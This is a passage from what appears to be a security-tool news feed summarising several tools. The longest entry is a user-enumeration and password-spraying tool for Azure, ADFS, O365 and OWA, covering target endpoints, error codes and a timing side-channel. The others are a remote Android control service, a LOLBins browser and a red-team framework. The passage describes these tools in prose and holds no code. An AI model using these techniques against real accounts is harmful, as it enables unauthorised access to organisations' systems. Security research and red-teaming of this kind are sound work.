And also, auto-BOF and auto-ret2 exploit features will be added



goEnumBruteSpray - User Enumeration And Password Bruteforce On Azure, ADFS, OWA, O365 And Gather Emails On Linkedin

26 November 2021 at 11:30
By: Zion3R


The recommended module is o365 for user enumeration and passwords bruteforce / spray . Additional information can be retrieved to avoid account lockout, to know that the password is good but expired, MFA enabled,...


Linkedin

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company will be searched on Linkedin and all people working at these companies will be returned in the specified format.

The Linkedin's session cookie li_at is required.


SearchEngine

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company name will be searched on Google and Bing with a dork to find people working in the company (site:linkedin.com/in+"%s"). The results title will be parsed to output email addresses in the specified format.



Azure

User enumeration

The Azure module is only available to enumerate the users of a tenant. The authentication request will be made on https://autologon.microsoftazuread-sso.com, a detailed response shows if the account does not exist, a MFA is required, if the account is locked, ...



ADFS

Passwords bruteforce / spray

The ADFS module is only available to bruteforce or spray a password. The authentication request is sent to https://<target>/adfs/ls/idpinitiatedsignon.aspx?client-request-id=<randomGUID>&pullStatus=0. An error message can informs the user if the password is expired


Β 

O365

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Several modes are available: office, oauth2 and onedrive (not implemented yet). The office mode is recommended as no authentication is made. Oauth2 can retrieve additional information through AADSTS error code (MFA enable, locked account, disabled account)



Passwords bruteforce / spray

As for the user enumeration, two modes are available: oauth2 and autodiscover (not implemented yet). The Oauth2 is the recommended mode, it allows to get much information thanks to the AADSTS error code.



OWA

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Enumeration is made with authentication requests. Authentication for a non-existent user will take longer than for a valid user. At first, the average response time for an invalid user will be calculated and then the response time for each authentication request will be compared.



Passwords bruteforce / spray

Please note that no account locking mechanism can be implemented because no information about it is returned.



Credits

https://github.com/busterb/msmailprobehttps://github.com/0xZDH/o365spray/https://github.com/xFreed0m/ADFSpray/https://github.com/m8r0wn/CrossLinked



Nanobrok - Web Service For Control And Protect Your Android Device Remotely

25 November 2021 at 20:30
By: Zion3R


Web Service write in Python for control and protect your android device remotely.Β 

The official app can be found on the PlayStore:


Overview

Nanobrok-Server is powerful opensource webservice for control and protect your android device, written in Python, that allow and offer a stable and security connection with your android device for protect , control remotely.

Main Features

  • Maps the location of your device
  • Alert flag (Event it's lost or stolen)
  • Recorder Audio Mic
  • Remote File Transfer [PRO]
  • Network scanner [PRO]
  • and more!

Security features

We implemented some security features for try protect your remote server. But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and I cannot guarantee its absolute security.

  • CSRF token
  • Sign-in attempt block limit
  • X-Frame-Options
  • Same origin policy (SOP)
  • CORS flask implementation
  • HTTPS force redirect
  • API Header X-CSRFToken
  • Self Signed Certificate (CA)

we are always looking to implement security features.

Supported platforms

  • Python: you need Python 3.7 or later to run Nanobrok-Server.

  • You can run localhost, VPS or as heroku app.

  • Operating System:

    • a recent version of Linux (we tested on Ubuntu 18.04 LTS);
    • please note: Windows is supported (was not tested yet)

Installation & Documentation

Learn more about using wiki

Contributing

See CONTRIBUTING.md for how to help out.

community

on discord: https://discord.gg/gYjBryBu

License

Nanobrok is licensed under the Apche 2.0.

Made with by P0cL4bs Team


LOLBins - PyQT5 App For LOLBAS And GTFOBins

25 November 2021 at 11:30
By: Zion3R


PyQT app to list all Living Off The Land Binaries and Scripts for Windows from LOLBAS and Unix binaries that can be used to bypass local security restrictions in misconfigured systems from GTFOBins.

Widnows


Linux



Redherd Framework -A Collaborative And Serverless Framework For Orchestrating A Geographically Distributed Group Of Assets

24 November 2021 at 20:30
By: Zion3R


RedHerd is a collaborative and serverless framework for orchestrating a geographically distributed group of assets capable of conducting simulating complex offensive cyberspace operations.

Getting Started

Take a look at the RedHerd documentation for instructions on how to getting started with the framework.

Cite this work

If you use RedHerd Framework for your research activity, cite the following paper published by MDPI (Multidisciplinary Digital Publishing Institute) https://www.mdpi.com/2624-6120/2/4/38

Links

Hereafter, some interesting links referred to the project:

Changelog

Go to CHANGELOG to see all the version changes.

License

This project is under the MIT license.

Contact us

Feel free to contact us at this e-mail address:


Disclaimer

The provided contents and tools are for awareness and research purposes only. Our target audience is composed of those interested in learning about Ethical Hacking, Security, Penetration Testing and Red Teaming. We are not responsible for any inappropriate or illegal usage of both proposed material and discussed topics.

Funding

This is a non-profit project which received neither funding nor sponsorship.



❌